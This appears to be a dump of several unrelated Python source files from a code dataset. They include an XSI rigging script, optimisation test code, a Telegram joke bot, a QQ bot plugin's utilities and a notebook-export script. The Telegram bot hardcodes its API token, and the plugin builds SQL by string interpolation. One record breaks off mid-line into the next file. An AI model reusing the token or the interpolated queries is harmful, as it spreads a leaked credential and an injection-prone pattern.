#\r\n\t\tself.con_toe_pivot.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowToePivot.FullName)\r\n\t\tself.con_ball_pivot.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowBallPivot.FullName)\r\n\t\tself.con_toe.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowFootCons.FullName)\r\n\t\tself.con_ball.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowFootCons.FullName)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# link the color of the FK controls to the IK_FK slider #\r\n\r\n\t\t# build the fk expression #\r\n\t\texpr_fk_r = ''\r\n\t\texpr_fk_g = ''\r\n\t\texpr_fk_b = ''\r\n\t\tif re.match(r'^left$', self.parent.symmetry, re.I):\r\n\t\t\texpr_fk_r = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_g = 'cond(%s.chain.blendik != 0.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_b = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\telse: \r\n\t\t\texpr_fk_r = 
'cond(%s.chain.blendik != 0.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_g = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_b = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\r\n\t\t# build the ik expression #\r\n\t\texpr_ik_r = ''\r\n\t\texpr_ik_g = ''\r\n\t\texpr_ik_b = ''\r\n\t\tif re.match(r'^left$', self.parent.symmetry, re.I):\r\n\t\t\texpr_ik_r = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_g = 'cond(%s.chain.blendik != 1.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_b = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\telse: \r\n\t\t\texpr_ik_r = 'cond(%s.chain.blendik != 1.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_g = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_b = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\r\n\t\t# add the expression to the controllers #\r\n\t\t\r\n\t\t# toe IK #\r\n\t\tdisp = self.con_toe.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_ik_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_ik_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_ik_b)\r\n\r\n\t\t# ball IK #\r\n\t\tdisp = self.con_ball.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_ik_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_ik_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_ik_b)\r\n\r\n\t\t# toe FK #\r\n\t\tdisp = self.con_toe_fk.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_fk_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_fk_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_fk_b)\r\n\r\n\t\t# foot FK #\r\n\t\tdisp = self.con_foot_fk.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_fk_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_fk_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_fk_b)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# link the visbility on the controls to the ik fk switcher #\r\n\t\t\r\n\t\t# controller #\r\n\t\tself.con_ball.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 0, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\tself.con_toe.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 0, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\t\r\n\t\t# fk #\r\n\t\tself.con_foot_fk.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 1, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\tself.con_toe_fk.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 1, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add character sets\r\n\t\tself.character_set = dispatch(self.character_set)\r\n\t\tif self.character_set:\r\n\t\t\t\r\n\t\t\t# get the lower subset #\r\n\t\t\tself.character_set = dispatch(self.character_set)\r\n\t\t\tlower_set = None\r\n\t\t\ttry:\r\n\t\t\t\tlower_set = self.character_set.Get('LowerBody')\r\n\t\t\texcept: \r\n\t\t\t\tlower_set = 
self.character_set.AddSubset('LowerBody')\r\n\t\r\n\t\t\t# add the foot subset #\r\n\t\t\tself.character_subset = lower_set.AddSubset(\r\n\t\t\t\txsi.zMapName(self.parent.basename, 'None', self.parent.symmetry)\r\n\t\t\t)\r\n\t\t\t\r\n\t\t\t# fk rotations #\r\n\t\t\tself.character_subset.AddNodeRot(self.con_foot_fk.node_con)\r\n\t\t\tself.character_subset.AddNodeRot(self.con_toe_fk.node_con)\r\n\r\n\t\t\t# con pos and rot #\r\n\t\t\tself.character_subset.AddNodePosRot(self.con_toe.node_con)\r\n\t\t\tself.character_subset.AddNodePosRot(self.con_ball.node_con)\r\n\t\t\t\r\n\t\t\t# add the pivots #\r\n\t\t\tself.character_subset.AddParams('%s.kine.local.rotz' % self.con_toe_pivot.node_con.FullName)\r\n\t\t\tself.character_subset.AddParams('%s.kine.local.rotz' % self.con_ball_pivot.node_con.FullName)\r\n\t\t\t\r\n\t\t\t# parameters #\r\n\t\t\tself.character_subset.AddParams(\r\n\t\t\t\t'%(item)s.ShowBallPivot, %(item)s.ShowToePivot' % \\\r\n\t\t\t\t{'item': self.prop_anim.FullName}\r\n\t\t\t)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add fk switch to controllers\r\n\t\tcol = dispatch('XSI.Collection')\r\n\t\tcol.Add(self.con_foot_fk.node_con) \r\n\t\tcol.Add(self.con_toe_fk.node_con) \r\n\t\tcol.Add(self.con_toe.node_con) \r\n\t\tcol.Add(self.con_ball.node_con) \r\n\t\tfor item in col:\r\n\t\t\tdi = item.AddProperty('CustomProperty', False, 'DisplayInfo_zAnim_Foot_%s' % self.parent.symmetry[0].upper())\r\n\t\t\tdi.AddProxyParameter(self.ik_switch, None, 'FK_IK')\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# link the toe and ball con visibility to the prop #\r\n\t\tself.con_ball.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\tself.prop_anim.ShowFootCons.FullName\r\n\t\t)\r\n\t\tself.con_toe.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\tself.prop_anim.ShowFootCons.FullName\r\n\t\t)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add middling nulls #\r\n\t\t\r\n\t\tif self.add_middlers:\r\n\t\t\t\r\n\t\t\t# create a middling stack under the deformer bunch #\r\n\t\t\tnode_dfm_parent = self.deformer_parent.AddNull(xsi.zMapName('Ankle', 'Custom:DfmPrnt', self.parent.symmetry))\r\n\t\t\tnode_dfm_shadow = node_dfm_parent.AddNull(xsi.zMapName('Ankle', 'Custom:DfmShdw', self.parent.symmetry))\r\n\t\t\tnode_ankle_env = node_dfm_shadow.AddNull(xsi.zMapName('Ankle', 'Env', self.parent.symmetry))\r\n\t\t\tself.deformers.Add(node_ankle_env)\r\n\t\t\r\n\t\t\t# hide the display #\r\n\t\t\txsi.zHide(node_dfm_parent)\r\n\t\t\txsi.zHide(node_dfm_shadow)\r\n\t\t\txsi.zHide(node_ankle_env)\r\n\t\t\t\r\n\t\t\t# add the constraints #\r\n\t\t\tlast_leg_bone = self.root_skel_leg.Bones(self.root_skel_leg.Bones.Count-1)\r\n\t\t\tnode_dfm_parent.Kinematics.AddConstraint('Pose', last_leg_bone, False)\r\n\t\t\tnode_dfm_shadow.Kinematics.AddConstraint('Pose', self.root_foot.Bones(0), False)\r\n\t\t\tcns = node_dfm_shadow.Kinematics.AddConstraint('Pose', last_leg_bone, False)\r\n\t\t\tcns = dispatch(cns)\r\n\t\t\tcns.cnspos.Value = False\r\n\t\t\tcns.cnsscl.Value = False\r\n\t\t\tcns.blendweight.Value = 0.5\r\n\t\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create a deformer stack #\r\n\t\t\r\n\t\t# foot #\r\n\t\tnode_dfm_parent = self.deformer_parent.AddNull(xsi.zMapName('Foot', 'Custom:DfmPrnt', self.parent.symmetry))\r\n\t\tnode_dfm_shadow = node_dfm_parent.AddNull(xsi.zMapName('Foot', 
'Custom:DfmShdw', self.parent.symmetry))\r\n\t\tself.env_foot = node_dfm_shadow.AddNull(xsi.zMapName('Foot', 'Env', self.parent.symmetry))\r\n\t\tself.deformers.Add(self.env_foot)\r\n\t\t\r\n\t\tnode_dfm_parent.primary_icon.Value \t= 0\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_dfm_shadow.primary_icon.Value \t= 0\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tself.env_foot.primary_icon.Value \t= 0\r\n\t\tself.env_foot.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tself.env_foot.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\t\r\n\t\tnode_dfm_parent.Kinematics.AddConstraint('Pose', self.root_foot, False)\r\n\t\tnode_dfm_shadow.Kinematics.AddConstraint('Pose', self.root_foot.Bones(0), False)\r\n\r\n\t\t# toe #\r\n\t\tnode_dfm_parent = self.deformer_parent.AddNull(xsi.zMapName('Toe', 'Custom:DfmPrnt', self.parent.symmetry))\r\n\t\tnode_dfm_shadow = node_dfm_parent.AddNull(xsi.zMapName('Toe', 'Custom:DfmShdw', self.parent.symmetry))\r\n\t\tself.env_toe\t= node_dfm_shadow.AddNull(xsi.zMapName('Toe', 'Env', self.parent.symmetry))\r\n\t\tself.deformers.Add(self.env_toe)\r\n\t\t\r\n\t\tnode_dfm_parent.primary_icon.Value \t= 0\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_dfm_shadow.primary_icon.Value \t= 0\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tself.env_toe.primary_icon.Value\t\t= 0\r\n\t\tself.env_toe.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tself.env_toe.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\t\r\n\t\tnode_dfm_parent.Kinematics.AddConstraint('Pose', self.root_foot, False)\r\n\t\tnode_dfm_shadow.Kinematics.AddConstraint('Pose', self.root_foot.Bones(1), False)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add the deformers to the deformers group #\r\n\t\tif self.group_deformers:\r\n\t\t\tself.group_deformers = dispatch(self.group_deformers)\r\n\t\t\tself.group_deformers.AddMember(self.deformers)\r\n\r\n\t\t# # for setup purposes only #\r\n\t\t# # report the class attributes #\r\n\t\t# for key in self.__dict__:\r\n\t\t# \tlog(key)\r\n\t\r\n\t\t\t","repo_name":"nazimba/Zoogloo-Tools","sub_path":"zBuilder/Application/Plugins/zFoot.py","file_name":"zFoot.py","file_ext":"py","file_size_in_byte":47204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9353984050","text":"import copy\n\n\nclass Individual:\n\n def __init__(self, X=None, F=None, CV=None, G=None, feasible=None, **kwargs) -> None:\n self.X = X\n self.F = F\n self.CV = CV\n self.G = G\n self.feasible = feasible\n self.data = kwargs\n self.attr = set(self.__dict__.keys())\n\n def has(self, key):\n return key in self.attr or key in self.data\n\n def set(self, key, value):\n if key in self.attr:\n self.__dict__[key] = value\n else:\n self.data[key] = value\n\n def copy(self):\n ind = copy.copy(self)\n ind.data = self.data.copy()\n return ind\n\n def get(self, *keys):\n\n def _get(key):\n if key in self.data:\n return 
self.data[key]\n elif key in self.attr:\n return self.__dict__[key]\n else:\n return None\n\n ret = []\n\n for key in keys:\n ret.append(_get(key))\n\n if len(ret) == 1:\n return ret[0]\n else:\n return tuple(ret)\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/model/individual.py","file_name":"individual.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"34650429388","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pytest\nfrom golem import *\nfrom olympus.campaigns import Campaign, ParameterSpace\nfrom olympus.objects import (\n ParameterCategorical,\n ParameterContinuous,\n ParameterDiscrete,\n ParameterVector,\n)\nfrom olympus.surfaces import Surface\n\nfrom atlas.planners.gp.planner import GPPlanner\nfrom atlas.utils.golem_utils import get_golem_dists\n\nCONT = {\n \"golem_config\": [\n # param config as dictionaries\n {\n \"name\": \"dicts\",\n \"config\": {\n \"param0\": {\"dist_type\": \"Normal\", \"dist_params\": {\"std\": 0.2}},\n \"param1\": {\"dist_type\": \"Normal\", \"dist_params\": {\"std\": 0.3}},\n },\n },\n # params as Golem distribution objects\n {\n \"name\": \"objects\",\n \"config\": {\n \"param0\": Normal(0.2),\n \"param1\": Normal(0.3),\n },\n },\n # missing parameters\n {\n \"name\": \"missing_param\",\n \"config\": {\n \"param0\": {\"dist_type\": \"Normal\", \"dist_params\": {\"std\": 0.2}},\n },\n },\n # all parameters = Delta(), should return None\n {\n \"name\": \"all_delta\",\n \"config\": {\n \"param0\": {\"dist_type\": \"Delta\", \"dist_params\": None},\n \"param1\": {\"dist_type\": \"Delta\", \"dist_params\": None},\n },\n },\n ]\n}\n\n\n@pytest.mark.parametrize(\"golem_config\", CONT[\"golem_config\"])\ndef test_get_golem_dists_cont(golem_config):\n test_name = golem_config[\"name\"]\n config = golem_config[\"config\"]\n\n param_space = ParameterSpace()\n param_space.add(ParameterContinuous(name=\"param0\"))\n param_space.add(ParameterContinuous(name=\"param1\"))\n\n dists = get_golem_dists(config, param_space)\n\n if test_name in [\"dicts\", \"objects\"]:\n assert all([isinstance(dist, Normal) for dist in dists])\n elif test_name == \"missing_param\":\n assert isinstance(dists[0], Normal)\n assert isinstance(dists[1], Delta)\n elif test_name == \"all_delta\":\n assert dists is None\n\n\n# @pytest.mark.parametrize(\"golem_config\", MIXED[\"golem_config\"])\n# def test_get_golem_dists_mixed(golem_config):\n#\n# test_name = golem_config['name']\n# config = golem_config['config']\n#\n# param_space = ParameterSpace()\n# param_0 = ParameterCategorical(\n# name=\"param_0\",\n# options=[\"x0\", \"x1\", \"x2\"],\n# descriptors=desc_param_0,\n# )\n# param_1 = ParameterDiscrete(\n# name=\"param_1\",\n# options=[0.0, 0.25, 0.5, 0.75, 1.0],\n# )\n# param_2 = ParameterContinuous(\n# name=\"param_2\",\n# low=0.0,\n# high=1.0,\n# )\n# param_3 = ParameterContinuous(\n# name=\"param_3\",\n# low=0.0,\n# high=1.0,\n# )\n# param_space.add(param_0)\n# param_space.add(param_1)\n# param_space.add(param_2)\n# param_space.add(param_3)\n#\n#\n# dists = get_golem_dists(config, param_space)\n\n\ndef test_golem_opt_cont():\n def surface(x):\n return np.sin(8 * x[0]) - 2 * np.cos(6 * x[1]) + np.exp(-2.0 * x[2])\n\n param_space = ParameterSpace()\n param_0 = ParameterContinuous(name=\"param0\", low=0.0, high=1.0)\n param_1 = ParameterContinuous(name=\"param1\", low=0.0, high=1.0)\n param_2 = ParameterContinuous(name=\"param2\", low=0.0, high=1.0)\n 
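# register the three continuous inputs with the shared parameter space\n    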
param_space.add(param_0)\n param_space.add(param_1)\n param_space.add(param_2)\n\n planner = GPPlanner(\n goal=\"minimize\",\n feas_strategy=\"naive-0\",\n init_design_strategy=\"lhs\",\n num_init_design=5,\n batch_size=1,\n acquisition_type=\"ei\",\n acquisition_optimizer=\"gradient\",\n golem_config={\n \"param0\": Normal(0.2),\n \"param1\": Normal(0.3),\n },\n )\n\n planner.set_param_space(param_space)\n\n campaign = Campaign()\n campaign.set_param_space(param_space)\n\n BUDGET = 10\n\n while len(campaign.observations.get_values()) < BUDGET:\n samples = planner.recommend(campaign.observations)\n for sample in samples:\n sample_arr = sample.to_array()\n measurement = surface(sample_arr)\n campaign.add_observation(sample_arr, measurement)\n\n assert len(campaign.observations.get_params()) == BUDGET\n assert len(campaign.observations.get_values()) == BUDGET\n\n\n# def test_golem_opt_mixed(golem_config):\n# ...\n\n\nif __name__ == \"__main__\":\n # test_get_golem_dists_cont(CONT['golem_config'][0])\n\n test_golem_opt_cont()\n","repo_name":"aspuru-guzik-group/atlas","sub_path":"tests/__TMP_test_golem.py","file_name":"__TMP_test_golem.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"73080529768","text":"import logging\r\nimport requests\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nfrom aiogram.types import InlineKeyboardMarkup\r\nfrom aiogram.types import InlineKeyboardButton\r\nfrom aiogram.types import reply_keyboard\r\nfrom aiogram.types import InlineKeyboardMarkup, ReplyKeyboardMarkup\r\nfrom aiogram.types import InlineKeyboardButton\r\nfrom aiogram.types import KeyboardButton\r\nimport asyncio\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\nbot = Bot(token='1276910299:AAHzjDM1Z02_eSYBhR5uiB2m2LHtgZnYxrI')\r\ndp = Dispatcher(bot)\r\n\r\n\r\n\r\ntoken = \"1276910299:AAHzjDM1Z02_eSYBhR5uiB2m2LHtgZnYxrI\"\r\nURL = 'https://api.telegram.org/bot' + token + '/'\r\n#https://api.telegram.org/bot1276910299:AAHzjDM1Z02_eSYBhR5uiB2m2LHtgZnYxrI/setWebhook?url=https://dd50f1ea6479.ngrok.io/\r\n\r\nbutton1 = KeyboardButton('Анекдоты')\r\nbutton2 = KeyboardButton('Рассказы')\r\nbutton3 = KeyboardButton('Афоризмы')\r\nbutton4 = KeyboardButton('Цитаты')\r\nbutton5 = KeyboardButton('Тосты')\r\nbutton6 = KeyboardButton('Статусы')\r\nbutton7 = KeyboardButton('Анекдоты (18+)')\r\nbutton8 = KeyboardButton('Рассказы (18+)')\r\nbutton9 = KeyboardButton('Афоризмы (18+)')\r\nbutton10 = KeyboardButton('Цитаты (18+)')\r\nbutton11 = KeyboardButton('Тосты (18+)')\r\nbutton12 = KeyboardButton('Статусы (18+)')\r\nmenu = ReplyKeyboardMarkup(resize_keyboard=True)\r\nmenu.insert(button1)\r\nmenu.insert(button2)\r\nmenu.insert(button3)\r\nmenu.insert(button4)\r\nmenu.insert(button5)\r\nmenu.insert(button6)\r\nmenu.insert(button7)\r\nmenu.insert(button8)\r\nmenu.insert(button9)\r\nmenu.insert(button10)\r\nmenu.insert(button11)\r\nmenu.insert(button12)\r\n# start\r\n@dp.message_handler(commands=['start', 'help'])\r\nasync def process_start_command(message: types.Message):\r\n sticker = open('./welcome_sticker.jpg', 'rb')\r\n await bot.send_sticker(message.chat.id, sticker)\r\n await message.reply(f\"Добрый вечер, {message.from_user.first_name}!\\n\", reply_markup=menu)\r\n\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def get_text_messages(message):\r\n if str(message[\"text\"]) == 'Анекдоты':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(1))\r\n elif 
str(message[\"text\"]) == 'Рассказы':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(2))\r\n elif str(message[\"text\"]) == 'Афоризмы':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(4))\r\n elif str(message[\"text\"]) == 'Цитаты':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(5))\r\n elif str(message[\"text\"]) == 'Тосты':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(6))\r\n elif str(message[\"text\"]) == 'Статусы':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(8))\r\n elif str(message[\"text\"]) == 'Анекдоты (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(11))\r\n elif str(message[\"text\"]) == 'Рассказы (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(12))\r\n elif str(message[\"text\"]) == 'Афоризмы (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(14))\r\n elif str(message[\"text\"]) == 'Цитаты (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(15))\r\n elif str(message[\"text\"]) == 'Тосты (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(16))\r\n elif str(message[\"text\"]) == 'Статусы (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(18))\r\n else:\r\n await bot.send_message(message.chat.id,\r\n \"С мамкой своей так будешь базарить.\")\r\n\r\n\r\ndef get_anekdot(n):\r\n #url = 'https://yobit.net/api/2/btc_usd/ticker'\r\n #print(\"Выберите категорию:\\n1 - Анекдот; \\n2 - Рассказы; \\n3 - Стишки;\\n4 - Афоризмы;\\n5 - Цитаты;\\n6 - Тосты;\\n8 - Статусы;\\n11 - Анекдот (+18);\\n12 - Рассказы (+18);\\n13 - Стишки (+18);\\n14 - Афоризмы (+18);\\n15 - Цитаты (+18);\\n16 - Тосты (+18);\\n18 - Статусы (+18);\")\r\n #n=input()\r\n #n=1\r\n url = 'http://rzhunemogu.ru/RandJSON.aspx?CType={}'.format(n)\r\n response = requests.get(url).text\r\n y = response.rfind('\"')\r\n return response[12:y]\r\n\r\n\r\nif __name__ == '__main__':\r\n executor.start_polling(dp, skip_updates=True)\r\n\r\n","repo_name":"madandalone/anekdotbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71806342568","text":"class Solution(object):\n def checkSubarraySum(self, nums, k):\n sum = [0]*len(nums)\n if len(nums) < 2:\n return False\n sum[0] = nums[0]\n for i in range(1, len(nums)):\n sum[i] = sum[i-1] + nums[i]\n for start in range(len(nums)):\n for j in range(2, len(nums)+1):\n if start+j-1 dict:\n with open(config_file, 'r', encoding='utf-8') as f: # 从json读配置\n config = json.loads(f.read())\n return config\n\n\nconfigs = load_config()\n\n\nasync def get_setting(group_id: int, setting_name: str) -> int:\n \"\"\"\n Return setting from database\n\n Args:\n group_id: group id\n setting_name: setting name\n\n Examples:\n setting = get_setting(12345678, \"repeat\")\n\n Return:\n Operation result\n \"\"\"\n sql = f\"SELECT {setting_name} from setting WHERE groupId={group_id}\"\n data = await execute_sql(sql)\n return data[0][0]\n\n\nasync def random_pic(base_path: str) -> str:\n \"\"\"\n Return random pic path in base_dir\n\n Args:\n base_path: Target library path\n\n Examples:\n pic_path = random_pic(wallpaper_path)\n\n Return:\n str: Target pic path\n \"\"\"\n path_dir = os.listdir(base_path)\n if not path_dir:\n raise ImagePathEmpty()\n path = random.sample(path_dir, 1)[0]\n return base_path + path\n\n\nasync def get_pic(image_type: str) -> MessageChain:\n \"\"\"\n Return random pics message\n\n 
Args:\n image_type: The type of picture to return\n\n Examples:\n assist_process = await get_pic(\"setu\")[0]\n message = await get_pic(\"real\")[1]\n\n Return:\n [\n str: Auxiliary treatment to be done(Such as add statement),\n MessageChain: Message to be send(MessageChain)\n ]\n \"\"\"\n async def color() -> str:\n if \"setuPath\" in configs.keys():\n base_path = configs[\"setuPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def color18() -> str:\n if \"setu18Path\" in configs.keys():\n base_path = configs[\"setu18Path\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def real() -> str:\n if \"realPath\" in configs.keys():\n base_path = configs[\"realPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def real_highq() -> str:\n if \"realHighqPath\" in configs.keys():\n base_path = configs[\"realHighqPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def wallpaper() -> str:\n if \"wallpaperPath\" in configs.keys():\n base_path = configs[\"wallpaperPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def sketch() -> str:\n if \"sketchPath\" in configs.keys():\n base_path = configs[\"sketchPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n switch = {\n \"setu\": color,\n \"setu18\": color18,\n \"real\": real,\n \"realHighq\": real_highq,\n \"bizhi\": wallpaper,\n \"sketch\": sketch\n }\n\n try:\n target_pic_path = await switch[image_type]()\n except ConfigurationNotFound:\n return MessageChain.create([Plain(f\"{image_type}Path参数未配置!请检查配置文件!\")])\n except ImagePathEmpty:\n return MessageChain.create([Plain(f\"{image_type}文件夹为空!请添加图片!\")])\n message = MessageChain.create([\n Image.fromLocalFile(target_pic_path)\n ])\n return message\n\n\nasync def check_group_data_init(group_list: list) -> None:\n sql = \"select groupId from setting\"\n data = await execute_sql(sql)\n group_id = list(chain.from_iterable(data))\n for i in group_list:\n # print(i.id, ':', i.name)\n if i.id not in group_id:\n sql = f\"INSERT INTO setting (groupId) VALUES ({i.id})\"\n await execute_sql(sql)\n sql = f\"INSERT INTO admin (groupId, adminId) VALUES ({i.id}, {configs['hostQQ']})\"\n await execute_sql(sql)\n\n\nasync def get_admin(group_id: int) -> list:\n sql = f\"SELECT adminId from admin WHERE groupId={group_id}\"\n data = await execute_sql(sql)\n admins = list(chain.from_iterable(data))\n return admins\n\n\nasync def update_setting(group_id: int, setting_name: str, new_setting_value) -> None:\n \"\"\"\n Update setting to database\n\n Args:\n group_id: Group id\n setting_name: Setting name\n new_setting_value: New setting value\n\n Examples:\n await update_setting(12345678, \"setu\", True)\n\n Return:\n None\n \"\"\"\n sql = f\"UPDATE setting SET {setting_name}={new_setting_value} WHERE groupId={group_id}\"\n await execute_sql(sql)\n\n\nasync def admin_management(group_id: int, member_id: int, operation: str) -> MessageChain:\n \"\"\"\n Update setting to database\n\n Args:\n group_id: Group id\n member_id: Member id\n operation: add/delete\n\n Examples:\n await admin_manage(12345678, 12345678, \"delete\")\n\n Return:\n None\n \"\"\"\n sql = f\"SELECT * FROM admin WHERE groupId={group_id} and adminId={member_id}\"\n exist = True if await 
execute_sql(sql) else False\n    if operation == \"add\":\n        if exist:\n            return MessageChain.create([Plain(text=f\"{member_id}已经是群{group_id}的管理员啦!\")])\n        else:\n            sql = f\"INSERT INTO admin (groupId, adminId) VALUES ({group_id}, {member_id})\"\n            await execute_sql(sql)\n            return MessageChain.create([Plain(text=f\"{member_id}被设置为群{group_id}的管理员啦!\")])\n    elif operation == \"delete\":\n        if exist:\n            sql = f\"DELETE FROM admin WHERE groupId={group_id} AND adminId={member_id}\"\n            await execute_sql(sql)\n            return MessageChain.create([Plain(text=f\"{member_id}现在不是群{group_id}的管理员啦!\")])\n        else:\n            return MessageChain.create([Plain(text=f\"{member_id}本来就不是群{group_id}的管理员哦!\")])\n    else:\n        return MessageChain.create([Plain(text=f\"operation error: {operation}\")])\n\n\nasync def add_group(group_id: int):\n    sql = f\"SELECT * FROM setting WHERE groupId={group_id}\"\n    if await execute_sql(sql):\n        return None\n    else:\n        sql = f\"INSERT INTO setting (groupId) VALUES ({group_id})\"\n        await execute_sql(sql)\n        sql = f\"INSERT INTO admin (groupId, adminId) VALUES ({group_id}, {configs['hostQQ']})\"\n        await execute_sql(sql)\n","repo_name":"SAGIRI-kawaii/saya_plugins_collection","sub_path":"modules/ImageSender/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6875,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"53"} +{"seq_id":"70561889769","text":"import sys\nimport nbconvert\nimport nbformat\n\nComplex_Networks = [\n    \"leggi_pdb\",\n    \"PCM_permute\",\n    \"ER_networks\",\n    \"real_net_analysis\",\n    \"laplacian_lab_07\",\n    \"open_network_growth_models\",\n]\n\nPattern_Recognition = [\n    \"Pat_Rec_Lab_1\",\n    \"SwissRoll_PCA_MDS_LLE_IsoMap_tSNE_UMAP\",\n    \"clustering_examples\",\n    \"simple_perceptron\",\n    \"neuron_class\",\n    \"scikit_intro\",\n]\n\nModels = [\n    \"bigrams\",\n    \"trigrams\",\n    \"concatenated_network\",\n    \"convolutional_network\",\n    